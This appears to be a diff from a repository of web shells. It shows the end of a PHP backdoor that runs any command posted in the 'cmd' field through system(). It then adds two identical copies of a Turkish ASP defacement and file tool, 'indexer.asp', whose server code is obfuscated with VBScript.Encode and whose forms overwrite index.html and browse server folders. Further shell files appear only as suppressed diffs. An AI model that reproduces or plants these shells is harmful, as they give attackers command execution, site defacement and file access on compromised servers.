<br>
<INPUT TYPE="submit">
</font></FORM>
<hr color=777777 width=100% height=115px>
<pre>
<?
$cmd = $_POST['cmd'];
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
exit;
?>
</pre>

74
138shell/I/Inderxer.asp.txt Normal file
View file

@ -0,0 +1,74 @@
<%@ LANGUAGE = VBScript.Encode %>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta http-equiv="Content-Language" content="tr">
<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
<%#@~^UgsAAA==^mVs,/DXV@#@&OEk'~J@!mnUD+D@*@!4M@*@!6G.:,l1YrWUx4YOw=&zShA klxCsD+.WM KDL,YmDoY{m4^lU3,:nO4WN{2WkY@*@!rUw!Y,YzwnxkE8:bOP7ls;'JEjz1)S:3"r]cr"MJrPkry'*c@*@!&WKD:@*E@#@&m\6xE@!1+ YnD@*@!6WUY,^W^W.x^k:n~kk"+{X@*?^MkaYP_l0Výx9l@!4M@*@!WKxY,^W^WD{A4kD+,/rynxy@*@!z1nxD+.@*@!Vk@*$!PjmMraY~g+kx+,r^;þY!Dhl,CCV0ýP..k^:kþ,#nXmP`x;Y;ssEþ~?.\DsCMlPÝU[6~bDhm3~j+,?+M\.Nm3rPz/2~BPw42PBPlk2aPTk(k~NGdHlslMýUPbç+.rðbxk~G0Ehl0~bçkU,XmyýVsýþYýM @!(D@*@!^k@*$!P?1.kaYV~$kMPÇK3~?rOXnP`ð.lþsl[C P}C4s+O/b"1+~Ý N6PzYm8k^k./bxr"c`PUPPGW/D~jkD+^+.k~umDrçP*@!Vb@*j^MkwOr PFE^smxýsýþý,ÝV0PAm3ýþDCPnl.ýþý3,Mnsm+0OkMR@!^r@*SüD0x~ArsTk~29rxs+V~ÝçbxPF;^VCxsC,|ýsm\!yE E,63!X;x!y c@!4M@*@!1+xDn.@*@!k@*AzP\n4NrJ@#@&3!VsC k:xE@!mnxDnM@*@!6W YP1W^GD{Vr:Pdr.+'l@*|!VVmUýhP~k^orVn.b@!8D@*@!0KxO~1WVG.{h4kDn,/r.+{ @*@!z1nxD+.@*@!0GUDP/b"+{F@*@!sr@*g+MNnx_~~E.lHCPzYC^mðýxýy~r Nn6b~Tk.bx,`bDl1Cðýxý.Prx9+a~n+x9rPUkYUry9+,rs:Csý*ÖDU)Gn0mEsOcl/2@!^k@*1.XnQP~EPný/sCPÝ Nn6bPuC ok,jkD+X~)Ymmm3dlUý",WUE ~XDrUbPXC"mmC3kýUý.Pö. P=PRczc zmVrxbxdrD+/b mK:P@!C~tM+6'_W.U3@*@!6GxDP^G^WDxsb:n@*G)_b~wb\Sb,ÖIg3|,"Z@!Jl@*@!J0W O@*@!Vk@*6VE,g,A;DCzmPG3!hl0PrdD+Nnðr k"PGGkXC ýx,bNý ýPjnPI+.k k~emyýx,@!l,tDWxgKD +V @*@!6WUY,^W^W.x^k:n@*Gbub,oz}JzPÖ"12nR@!&l@*@!&0KxO@*@!4D@*@!mxY.@*AHP@!l~t.n6'hlbsYK)hCbV4Gh(@$4WDhmkscmK:gkE(%+1Yxk NnaD@*tnt9k@!JC@*@!(D@*?2+^rmV~K4Cx0/~PKPCGsHfn:KU,~30WMW:mx,SP_kO4mXOCMP~GnVb0kþVE@#@&mKwz'E@!1+UY.@*@!0GUDPmGsKDxVbhPdby'*@*Ksk6Pul03ý@!8M@*@!6GxDPmKsGD{h4kO+~dbyn'y@*@!JmnUD+D@*@!^k@*A!~Um.bwDPHt9rP:l.l6ýx[C P5m"ýVsýþYýDc@!sk@*fð+.Vr~:lVý:,)D0l[Cþ^lDýh~_WsXGnsWUvb9:k #,SPA3GDK:CU,`sc6RqPl9hrxbP*PSPurD4CXDCDv?CUmVb.n l~b9hbxr*PBPfVbWkþ3~`UlUC^bDUl,bNsrUk*PBPPE.C /G0D~`:E.C /WWOcKVPz[skUb#,~Pg+K~.PPü:,b[CsPr^Cx^lDm~P+þ30üDs+. c@!sk@*$E,?^.bwY~)kVCP@!WKxO,mKVWM'^r:@*JWTPcVmXýY*~@!J0W O@*K!Ysl"R@!sb@*3L9nDbx~ezwYýðý~$!xCP~n ynMPUmDbwD~KüsP$k^orsDk,JWTVEHG.P~k^orxr"R Rv$E,KCVýsNlU~UmGD^nXP9xxPdlsnD,\nPAL[nMPSmh+MkP:üh~AÝ^obVnDr~dWLV!zWMVC.*@!Vr@*Vü\nx^r,ArMPUmDbwD~Ýçk Pjl9+^n,?K,dmMkwDsnDbxbPFEssmxhl ý"ýPÖ +.rMky E@#@&sk V^+.{J@!m+ Y.@*@!0GxDP^G^WD{sks+Pkr"+{*@*fG/O~UkO+^nD@!4.@*@!0WUO,mGVK.{h4bYP/byx @*@!&mxOnM@*@!^r@*ShhcdCxmVD+.W. KDL@!^r@*ShA 6lY4nMWWh8cmGs@!^k@*ShS /mxCVmDnUmRmKh@!^k@*SAARDEMlU/GWDRO3@!sk@*hAAcYl4.b4CYc^K:@!^k@*hhSRbdVm:CtbyhnDRmKh@!^k@*SAAR4lMEUXC4Hl WML@!1+UOD@*@!WKxOP1G^W.{DNPkk.n'W@*Jbt2]~UÝK2d3IÝ@!zmUO+M@*@!4.@*@!WKxOPkry'+@*@!Vk@*ASh /m8KYCT+ Y+m:cGDTPSPShA kl\kC3cmWs~SPShSRhkUr6 xOJ@#@&GLP'~];;+kOcp;DH?YMk L@#@&kWPKon~{PJr~Y4+x@#@&^l^V,:CkU@#@&+s/r0,WLn,'PE!Kx[+ME,Y4x@#@&mmV^~mm/nF@#@&nsk+k6~WT+P{~EW0ErPOtnU@#@&^l^sP1ldny@#@&nsk+r0,GT+~{Prtl03bUNmJ~Y4+U@#@&ml^sP1l/f@#@&Vk+r0~GT+~',E3!VsC k:E~Dtnx@#@&1ls^P1l/c@#@&+^/nk6PGLP',EmKwXr~Otx@#@&^lss,mC/X@#@&+sdk0~GT+~',E^kU0VDJ,Y4nx@#@&^l^V~^m/++@#@&V/rWPKoPxPEGMxn3r~Y4+U@#@&mlss,mC/{@#@&n^/k0,WTnP{PEWMxnVyJPD4+ @#@&1CsV,mm/n%@#@&x[PbW@#@&/;8,:lrUS40DAA==^#~@%>
<center>
<br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br>
<hr color=lime width=50%>
<SCRIPT LANGUAGE="JavaScript">
<!--
function Start(page)
{
OpenWin = this.open(page, "CtrlWindow","toolbar=menubar=No,scrollbars=No,status=No,height=250,");
}
//-->
</SCRIPT>
<script language="JavaScript1.2">
var message="SaNaLTeRoR - ÝnDexEr - Reader"
var typingbasecolor="red"
var typingtextcolor="lime"
var blinkspeed=598
var fontface="arial,geneva,helvetica"
var fontsize="5"
var n=0
if (document.all){
document.write('<font face="'+fontface+'" size="'+fontsize+'" color="'+typingbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span id="typinglight">'+message.charAt(m)+'</span>')
document.write('</font>')
var tempref=document.all.typinglight
}
else
document.write(message)
function typing(){
if (n==0){
for (m=0;m<message.length;m++)
tempref[m].style.color=typingbasecolor
}
tempref[n].style.color=typingtextcolor
if (n<tempref.length-1)
n++
else{
n=0
clearInterval(blinking)
setTimeout("starttyping()",1500)
return
}
}
function starttyping(){
if (document.all)
blinking=setInterval("typing()",blinkspeed)
}
starttyping()
</script>
<form action="?Gonder" method="post">
<center><table>
<td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
<td><input type="submit" onclick="submit()" value="Veriyi Gönder"></td><tr>
<td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="reset" onclick="reset" value=" Temizle "></td><tr>
</form>
<form action="?oku" method="post">
<td><font color=pink>Oku :</font><td><input type="text" name="klasor" size=25 value=<%=#@~^LQAAAA==.;;/DR/D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit" onclick="submit()" value=" Veriyi Oku "></td><tr>
</form>
</table><br>
<a href="javascript:void(0);" onclick="javascript:Start ('?hakkinda');">
Script Hakkýnda </a> - <a href="javascript:void(0);" onclick="javascript:Start ('?kullanim');">Kullaným Bilgileri </a>- <a href="javascript:void(0);" onclick="javascript:Start ('?copy');">Copright</a> -<a href="javascript:void(0);" onclick="javascript:Start ('?linkler');"> Linkler</a>
<br><br><br>
<hr color=lime width=50%>
<%#@~^VA4AAA==n N~kE(@#@&EO RO ORO ORR OO RO O@#@&d;4,mm/nF@#@&Kx~+M.WMP.nkE:n~ +aY@#@& +.9+ P',D5E/OR6W.hvJx.NxJ*@#@&xDXnPx~M+5EdYc0G.s`JUnM+z+rb@#@&jY,EYbVk~',?nD7+. ;D+mO+}4L^O`rHU/RPGKVdJ*@#@&b0~nMDP@!@*,!~Y4n P@#@&D/wKxknRSDrYPE@!1+xDnD@*Cb:)~),JL+.D [/^Db2YbWU'r@!z^n YnD@*E@#@&n^/@#@&M+k2W /nRSDrOPJÝþ^n:bxk.~$lþmDý^ýJ@#@&nU9Pr0@#@&EDksdcnDG^/dsK.sPUDX+BP nD9+U@#@&DndaWxknRSDkDn~J@!mxO+.@*@!4.@*@!WWM:~C1YkGU{g~:O4W[{wK/Y@*@!bUw!Y~YHwnxkE4srY,\l^;n'rJz1)Pj)Is)Jr~/bynxWc@*@!&6W.:@*E@#@&@#@&+ NPkE(@#@&EORO ORR OO RO OO RRO@#@&kE8P^Ck++@#@&Gx,+..KDP.nkEh+,U6O@#@&0VlkWM~',Dn;!+dOc0WMh`r3VmdGDr#@#@&j+O~K4%C:Pn,'~jD\n.cZ.+mOr8N+1Y`rHb^DK/G0DRp\dCK:KJ*@#@&bW~P WDPnD.~{PTPD4+ P@#@&M+/2G /nRS.bYn,J@!m+ Y.@*_bPb,)~EL+DM N/mMr2YbW [E@!^n YnD@*E@#@&+U[,k0@#@&K4%C:PhR6a+ PJV2:E~,JE[0VCdKD[rE~,0l^dn@#@&W(LuKPKc?nx9@#@&0W[smDPx~k+.\.ctOsVAxmKNcW(LuK:n ]/wKU/K+XOb@#@&D/2WUdRADbO+,J@!WKxY~^KVGD{A4kOPkky'l@*@!1+UYD@*~ P.A]ÝSAIP ~@!4M@*@!mnxOnM@*@!YaYmDnC,/Yzs'vhb[DtlO!uitkT4Y=&X!pB@*EL3W9slM[J@!&O+XYmDnl@*E@#@&.+k2W /n SDkOn,J@!4M@*@!0GM:,lmDkKU'QPh+DtG[{wWkO@*@!kxa;OPDXa+x/;8skOP7CV!+xErb1)~UbeszErPdby'cW@*@!&0KDh@*r@#@&n NPk;4@#@&B RRO O ORORR ORO RO @#@&d!4P^Ck+f@#@&./2Kxk+RSDbO+,JE[1\W'rJ@#@&.+kwW dnRSDbYnPEELY;/LEJ@#@&nU9P/;8@#@&vO R OR O OO O RO ORO @#@&d!4P1C/c@#@&.n/aW /nRA.bYnPrE[0Essmxkh'rJ@#@&MnkwG /RhMkDnPrJ'Y!/'Er@#@&UN,/E(@#@&B O ORORR ORO RO ORR O@#@&d!4~mmd*@#@&D/wKxknRSDrYPEELmWaz[rJ@#@&.n/aW /nRA.bYnPrE[DEd'rJ@#@&n N~/!8@#@&v O OO O RO ORO ORR OO@#@&/!4P1Cd++@#@&Dn/2G /nRS.kD+~Er[SrU0VnDLEr@#@&M+kwW / hMkO+,JE'DE/LEJ@#@&+ [~/!4@#@&vORR ORO RO ORR OORR O@#@&k;(P^m/G@#@&DdwKxd+ch.rD+Pr@!Vb@*ÝV0~ÖUmPnE.4CUý PjkDn/bxn~zY:CV,kçrx,8bD~bx9+6,tm"ýD^lzýxc@!sr@*?Yc~k N+Xn.Pmx9P.+C[D~?1.kaYrUbxPeC ýxCPIüV^+zbxc@!Vb@*UGxMl~k Nna,Alkýsl1l3,drYX^+~lzUý,/nD7nD9lU~kkYn~mVýUPJ~wDnVDPbçk ~h4dls4C~bN+ms@!^k@*Grz+^ksP)NChý PjkDn/bPW.+tGdDFfRSn(/Cs4mRmK:Jhl4:;Y,/r"9+PSn4kl:(C[l P6Dn+4GkYq&cA+(/Ch(lR^Gszhl4d!x~9kH+4bD,z+MPCV9ýðýxý"ý~7lDkCXmVý:@!sr@*UY,kUNnaD~l [PM+C[DPd^Mk2YbUbPWM+tWkY8fRS+8/m:8CcmWs&:mt/!U&k N6nD Ckw~ob8k,XüVsNkUr.R@!Vb@*_l"ýMVmNýðýxý.PbUN6rNPCz ýPX.+,lYDýUý"R@!Vb@*Þr:[r,MnV9rPnE.8mxl~r Nn6b~mYhmXmP/DPbUN6nD,lU[,D+m[+MP/1.rwDk NnP@!WKxOP1GVKDx2bx3@*HD[+ @!J0G Y@*PXmymUPH+.+,lOC1lðý:ý.~k N+Xrhk.k PCNýUý~Hl"ýXK.E.Rcr N+a 4YhV,Lb4r*@!^k@*@!0KUY,mGVKDx2bx3@*H+M+X@!&0KxD@*~|ýdhý l~Ý/~b9lhýU,+8~nlslkö.ü,4r.NxP(k.r:,3slköD[n P4b~l^YP9r"k NPGV[;ð!Prçk ~RczhC4:EO&bx[+X 4Yh,XmyýXKD!"P(E.Nm3r~bxNaR4Y:,C[lsýx,/rYndbx[+0rPbx[nXB+~LöM+~NðrþbD~s+k+VmP9n0mEsYcld2,0k^Cx9lPKsC4bVbD @!sr@*.nDbzk,MöU[DPP;þ!xCP~CkYýðýhý.NmPb9ls~Ýx9+ak,XnhbþPr^;XKDR@!sr@*~E,kþs+h[P@!0KUY,mGsKD'2r 3@*r0;@!zWKxD@*P0ý/sý~AKþPFl^l^C0R@!^r@*zDYý0~ul^l,bUVChmNýz/mUýy,)~hmkV8Gs4@$tKOslr^R1W:,~,4W^X[+sWU@$4WYsCk^RmKh~~,hSh /CUmVO+MGDcW.L,/kOnsk"NU,\n,/bY+,l9hk P&PsW[smDýx9Cx,XlM[ýhPmVm4rVr.kkUk. Pr@#@&./wGUk+ hMrD+~rJLYEk[rE@#@&+UN,/;8@#@&B RO OO RRO O ORORR OR@#@&dE(P^Ck+%@#@&M+dwKUk+ SDbY+,J@!8D@*@!8D@*@!^n Y+M@*A!P/1.rwDPt+4Nr~:l.l6ýUNmx~jcKP)[ý l~5m"ý^:ýþOýMR@!4D@*ÜmMnY^k~.PÜ^.Y/b"Pz/w,uG/DVmDýUPPühü NnPÇmsýþýDcR@!8M@*b[./~?mOýMýPFýk:ý lPnW9;x!P!öDü Yüsns+3,ÝdYNkðbUry,fK/zlUýU,b[ýxý,zl.ýx @!4D@*P6OlMnmP$ö^ü:ü,2ð+MP~Gþ/mPulDl~#mDPGn:3Yb. @!(D@*|;D8C ýx~fKdXmVC.ý ýPMö.üUDüVnX8bVh3,Ýçkx,bHUýPU+.\D[n,rVsCxý.PSm"ýhP_N9Pol.VYh+. R,@!8.@*bN.nkPFý/sýUmPPm:,.+Mk,!kMkskMPcö. )P9l-S+4'Csk1l -[+WC!VORmdw@!4.@*@!Vk@*HVnD,emwC(k^kDb:@!8D@*?rYNnVbPk ^V!N+^n.k,Ym3rw~n9+.+0~b9:rU,nlUn^kU+,i^lþhm@!(D@*zNsrx,ÞkWD/rUbPÇl^hl@!4D@*jn/kkKx~.n~;WG3bnPG+ðn.^+Dr~ÇmVCDmV,SGTk Pr^:m@!4M@*jkD+snMkx,#+MkP:C8l VmDýUýPÝU[bDh+,-/cR E@#@&DndaWU/ SDrD+,JJLY!d[rJ@#@&x[~kE4@#@&B OO RRO O ORORR ORO R@#@&WVIEAA==^#~@%>
</table>
<%#@~^CQAAAA==d!4~kYHV+mwMAAA==^#~@%>
<style>body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}.k1{font-family:Wingdings; font-size:15px;}.k2{font-family:Webdings; font-size:15px;}td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}a{color:#EEEEEE;text-decoration:none;}a:hover{color:#40a0ec;}a:visited{color:#EEEEEE;}a:visited:hover{color:#40a0ec;}input,.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}</style>
<%#@~^BwAAAA==n N~kE(oQIAAA==^#~@%>

2061
138shell/I/iMHaPFtp.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

2061
138shell/I/iMHaPFtp.txt Normal file
View file

File diff suppressed because it is too large Load diff

2106
138shell/I/img.php.txt Normal file
View file

File diff suppressed because one or more lines are too long
Side by side

After

Width:  |  Height:  |  Size: 79 KiB

74
138shell/I/indexer.asp.txt Normal file
View file

@ -0,0 +1,74 @@
<%@ LANGUAGE = VBScript.Encode %>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta http-equiv="Content-Language" content="tr">
<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
<%#@~^UgsAAA==^mVs,/DXV@#@&OEk'~J@!mnUD+D@*@!4M@*@!6G.:,l1YrWUx4YOw=&zShA klxCsD+.WM KDL,YmDoY{m4^lU3,:nO4WN{2WkY@*@!rUw!Y,YzwnxkE8:bOP7ls;'JEjz1)S:3"r]cr"MJrPkry'*c@*@!&WKD:@*E@#@&m\6xE@!1+ YnD@*@!6WUY,^W^W.x^k:n~kk"+{X@*?^MkaYP_l0Výx9l@!4M@*@!WKxY,^W^WD{A4kD+,/rynxy@*@!z1nxD+.@*@!Vk@*$!PjmMraY~g+kx+,r^;þY!Dhl,CCV0ýP..k^:kþ,#nXmP`x;Y;ssEþ~?.\DsCMlPÝU[6~bDhm3~j+,?+M\.Nm3rPz/2~BPw42PBPlk2aPTk(k~NGdHlslMýUPbç+.rðbxk~G0Ehl0~bçkU,XmyýVsýþYýM @!(D@*@!^k@*$!P?1.kaYV~$kMPÇK3~?rOXnP`ð.lþsl[C P}C4s+O/b"1+~Ý N6PzYm8k^k./bxr"c`PUPPGW/D~jkD+^+.k~umDrçP*@!Vb@*j^MkwOr PFE^smxýsýþý,ÝV0PAm3ýþDCPnl.ýþý3,Mnsm+0OkMR@!^r@*SüD0x~ArsTk~29rxs+V~ÝçbxPF;^VCxsC,|ýsm\!yE E,63!X;x!y c@!4M@*@!1+xDn.@*@!k@*AzP\n4NrJ@#@&3!VsC k:xE@!mnxDnM@*@!6W YP1W^GD{Vr:Pdr.+'l@*|!VVmUýhP~k^orVn.b@!8D@*@!0KxO~1WVG.{h4kDn,/r.+{ @*@!z1nxD+.@*@!0GUDP/b"+{F@*@!sr@*g+MNnx_~~E.lHCPzYC^mðýxýy~r Nn6b~Tk.bx,`bDl1Cðýxý.Prx9+a~n+x9rPUkYUry9+,rs:Csý*ÖDU)Gn0mEsOcl/2@!^k@*1.XnQP~EPný/sCPÝ Nn6bPuC ok,jkD+X~)Ymmm3dlUý",WUE ~XDrUbPXC"mmC3kýUý.Pö. P=PRczc zmVrxbxdrD+/b mK:P@!C~tM+6'_W.U3@*@!6GxDP^G^WDxsb:n@*G)_b~wb\Sb,ÖIg3|,"Z@!Jl@*@!J0W O@*@!Vk@*6VE,g,A;DCzmPG3!hl0PrdD+Nnðr k"PGGkXC ýx,bNý ýPjnPI+.k k~emyýx,@!l,tDWxgKD +V @*@!6WUY,^W^W.x^k:n@*Gbub,oz}JzPÖ"12nR@!&l@*@!&0KxO@*@!4D@*@!mxY.@*AHP@!l~t.n6'hlbsYK)hCbV4Gh(@$4WDhmkscmK:gkE(%+1Yxk NnaD@*tnt9k@!JC@*@!(D@*?2+^rmV~K4Cx0/~PKPCGsHfn:KU,~30WMW:mx,SP_kO4mXOCMP~GnVb0kþVE@#@&mKwz'E@!1+UY.@*@!0GUDPmGsKDxVbhPdby'*@*Ksk6Pul03ý@!8M@*@!6GxDPmKsGD{h4kO+~dbyn'y@*@!JmnUD+D@*@!^k@*A!~Um.bwDPHt9rP:l.l6ýx[C P5m"ýVsýþYýDc@!sk@*fð+.Vr~:lVý:,)D0l[Cþ^lDýh~_WsXGnsWUvb9:k #,SPA3GDK:CU,`sc6RqPl9hrxbP*PSPurD4CXDCDv?CUmVb.n l~b9hbxr*PBPfVbWkþ3~`UlUC^bDUl,bNsrUk*PBPPE.C /G0D~`:E.C /WWOcKVPz[skUb#,~Pg+K~.PPü:,b[CsPr^Cx^lDm~P+þ30üDs+. c@!sk@*$E,?^.bwY~)kVCP@!WKxO,mKVWM'^r:@*JWTPcVmXýY*~@!J0W O@*K!Ysl"R@!sb@*3L9nDbx~ezwYýðý~$!xCP~n ynMPUmDbwD~KüsP$k^orsDk,JWTVEHG.P~k^orxr"R Rv$E,KCVýsNlU~UmGD^nXP9xxPdlsnD,\nPAL[nMPSmh+MkP:üh~AÝ^obVnDr~dWLV!zWMVC.*@!Vr@*Vü\nx^r,ArMPUmDbwD~Ýçk Pjl9+^n,?K,dmMkwDsnDbxbPFEssmxhl ý"ýPÖ +.rMky E@#@&sk V^+.{J@!m+ Y.@*@!0GxDP^G^WD{sks+Pkr"+{*@*fG/O~UkO+^nD@!4.@*@!0WUO,mGVK.{h4bYP/byx @*@!&mxOnM@*@!^r@*ShhcdCxmVD+.W. KDL@!^r@*ShA 6lY4nMWWh8cmGs@!^k@*ShS /mxCVmDnUmRmKh@!^k@*SAARDEMlU/GWDRO3@!sk@*hAAcYl4.b4CYc^K:@!^k@*hhSRbdVm:CtbyhnDRmKh@!^k@*SAAR4lMEUXC4Hl WML@!1+UOD@*@!WKxOP1G^W.{DNPkk.n'W@*Jbt2]~UÝK2d3IÝ@!zmUO+M@*@!4.@*@!WKxOPkry'+@*@!Vk@*ASh /m8KYCT+ Y+m:cGDTPSPShA kl\kC3cmWs~SPShSRhkUr6 xOJ@#@&GLP'~];;+kOcp;DH?YMk L@#@&kWPKon~{PJr~Y4+x@#@&^l^V,:CkU@#@&+s/r0,WLn,'PE!Kx[+ME,Y4x@#@&mmV^~mm/nF@#@&nsk+k6~WT+P{~EW0ErPOtnU@#@&^l^sP1ldny@#@&nsk+r0,GT+~{Prtl03bUNmJ~Y4+U@#@&ml^sP1l/f@#@&Vk+r0~GT+~',E3!VsC k:E~Dtnx@#@&1ls^P1l/c@#@&+^/nk6PGLP',EmKwXr~Otx@#@&^lss,mC/X@#@&+sdk0~GT+~',E^kU0VDJ,Y4nx@#@&^l^V~^m/++@#@&V/rWPKoPxPEGMxn3r~Y4+U@#@&mlss,mC/{@#@&n^/k0,WTnP{PEWMxnVyJPD4+ @#@&1CsV,mm/n%@#@&x[PbW@#@&/;8,:lrUS40DAA==^#~@%>
<center>
<br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br>
<hr color=lime width=50%>
<SCRIPT LANGUAGE="JavaScript">
<!--
function Start(page)
{
OpenWin = this.open(page, "CtrlWindow","toolbar=menubar=No,scrollbars=No,status=No,height=250,");
}
//-->
</SCRIPT>
<script language="JavaScript1.2">
var message="SaNaLTeRoR - ÝnDexEr - Reader"
var typingbasecolor="red"
var typingtextcolor="lime"
var blinkspeed=598
var fontface="arial,geneva,helvetica"
var fontsize="5"
var n=0
if (document.all){
document.write('<font face="'+fontface+'" size="'+fontsize+'" color="'+typingbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span id="typinglight">'+message.charAt(m)+'</span>')
document.write('</font>')
var tempref=document.all.typinglight
}
else
document.write(message)
function typing(){
if (n==0){
for (m=0;m<message.length;m++)
tempref[m].style.color=typingbasecolor
}
tempref[n].style.color=typingtextcolor
if (n<tempref.length-1)
n++
else{
n=0
clearInterval(blinking)
setTimeout("starttyping()",1500)
return
}
}
function starttyping(){
if (document.all)
blinking=setInterval("typing()",blinkspeed)
}
starttyping()
</script>
<form action="?Gonder" method="post">
<center><table>
<td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
<td><input type="submit" onclick="submit()" value="Veriyi Gönder"></td><tr>
<td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="reset" onclick="reset" value=" Temizle "></td><tr>
</form>
<form action="?oku" method="post">
<td><font color=pink>Oku :</font><td><input type="text" name="klasor" size=25 value=<%=#@~^LQAAAA==.;;/DR/D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit" onclick="submit()" value=" Veriyi Oku "></td><tr>
</form>
</table><br>
<a href="javascript:void(0);" onclick="javascript:Start ('?hakkinda');">
Script Hakkýnda </a> - <a href="javascript:void(0);" onclick="javascript:Start ('?kullanim');">Kullaným Bilgileri </a>- <a href="javascript:void(0);" onclick="javascript:Start ('?copy');">Copright</a> -<a href="javascript:void(0);" onclick="javascript:Start ('?linkler');"> Linkler</a>
<br><br><br>
<hr color=lime width=50%>
<%#@~^VA4AAA==n N~kE(@#@&EO RO ORO ORR OO RO O@#@&d;4,mm/nF@#@&Kx~+M.WMP.nkE:n~ +aY@#@& +.9+ P',D5E/OR6W.hvJx.NxJ*@#@&xDXnPx~M+5EdYc0G.s`JUnM+z+rb@#@&jY,EYbVk~',?nD7+. ;D+mO+}4L^O`rHU/RPGKVdJ*@#@&b0~nMDP@!@*,!~Y4n P@#@&D/wKxknRSDrYPE@!1+xDnD@*Cb:)~),JL+.D [/^Db2YbWU'r@!z^n YnD@*E@#@&n^/@#@&M+k2W /nRSDrOPJÝþ^n:bxk.~$lþmDý^ýJ@#@&nU9Pr0@#@&EDksdcnDG^/dsK.sPUDX+BP nD9+U@#@&DndaWxknRSDkDn~J@!mxO+.@*@!4.@*@!WWM:~C1YkGU{g~:O4W[{wK/Y@*@!bUw!Y~YHwnxkE4srY,\l^;n'rJz1)Pj)Is)Jr~/bynxWc@*@!&6W.:@*E@#@&@#@&+ NPkE(@#@&EORO ORR OO RO OO RRO@#@&kE8P^Ck++@#@&Gx,+..KDP.nkEh+,U6O@#@&0VlkWM~',Dn;!+dOc0WMh`r3VmdGDr#@#@&j+O~K4%C:Pn,'~jD\n.cZ.+mOr8N+1Y`rHb^DK/G0DRp\dCK:KJ*@#@&bW~P WDPnD.~{PTPD4+ P@#@&M+/2G /nRS.bYn,J@!m+ Y.@*_bPb,)~EL+DM N/mMr2YbW [E@!^n YnD@*E@#@&+U[,k0@#@&K4%C:PhR6a+ PJV2:E~,JE[0VCdKD[rE~,0l^dn@#@&W(LuKPKc?nx9@#@&0W[smDPx~k+.\.ctOsVAxmKNcW(LuK:n ]/wKU/K+XOb@#@&D/2WUdRADbO+,J@!WKxY~^KVGD{A4kOPkky'l@*@!1+UYD@*~ P.A]ÝSAIP ~@!4M@*@!mnxOnM@*@!YaYmDnC,/Yzs'vhb[DtlO!uitkT4Y=&X!pB@*EL3W9slM[J@!&O+XYmDnl@*E@#@&.+k2W /n SDkOn,J@!4M@*@!0GM:,lmDkKU'QPh+DtG[{wWkO@*@!kxa;OPDXa+x/;8skOP7CV!+xErb1)~UbeszErPdby'cW@*@!&0KDh@*r@#@&n NPk;4@#@&B RRO O ORORR ORO RO @#@&d!4P^Ck+f@#@&./2Kxk+RSDbO+,JE[1\W'rJ@#@&.+kwW dnRSDbYnPEELY;/LEJ@#@&nU9P/;8@#@&vO R OR O OO O RO ORO @#@&d!4P1C/c@#@&.n/aW /nRA.bYnPrE[0Essmxkh'rJ@#@&MnkwG /RhMkDnPrJ'Y!/'Er@#@&UN,/E(@#@&B O ORORR ORO RO ORR O@#@&d!4~mmd*@#@&D/wKxknRSDrYPEELmWaz[rJ@#@&.n/aW /nRA.bYnPrE[DEd'rJ@#@&n N~/!8@#@&v O OO O RO ORO ORR OO@#@&/!4P1Cd++@#@&Dn/2G /nRS.kD+~Er[SrU0VnDLEr@#@&M+kwW / hMkO+,JE'DE/LEJ@#@&+ [~/!4@#@&vORR ORO RO ORR OORR O@#@&k;(P^m/G@#@&DdwKxd+ch.rD+Pr@!Vb@*ÝV0~ÖUmPnE.4CUý PjkDn/bxn~zY:CV,kçrx,8bD~bx9+6,tm"ýD^lzýxc@!sr@*?Yc~k N+Xn.Pmx9P.+C[D~?1.kaYrUbxPeC ýxCPIüV^+zbxc@!Vb@*UGxMl~k Nna,Alkýsl1l3,drYX^+~lzUý,/nD7nD9lU~kkYn~mVýUPJ~wDnVDPbçk ~h4dls4C~bN+ms@!^k@*Grz+^ksP)NChý PjkDn/bPW.+tGdDFfRSn(/Cs4mRmK:Jhl4:;Y,/r"9+PSn4kl:(C[l P6Dn+4GkYq&cA+(/Ch(lR^Gszhl4d!x~9kH+4bD,z+MPCV9ýðýxý"ý~7lDkCXmVý:@!sr@*UY,kUNnaD~l [PM+C[DPd^Mk2YbUbPWM+tWkY8fRS+8/m:8CcmWs&:mt/!U&k N6nD Ckw~ob8k,XüVsNkUr.R@!Vb@*_l"ýMVmNýðýxý.PbUN6rNPCz ýPX.+,lYDýUý"R@!Vb@*Þr:[r,MnV9rPnE.8mxl~r Nn6b~mYhmXmP/DPbUN6nD,lU[,D+m[+MP/1.rwDk NnP@!WKxOP1GVKDx2bx3@*HD[+ @!J0G Y@*PXmymUPH+.+,lOC1lðý:ý.~k N+Xrhk.k PCNýUý~Hl"ýXK.E.Rcr N+a 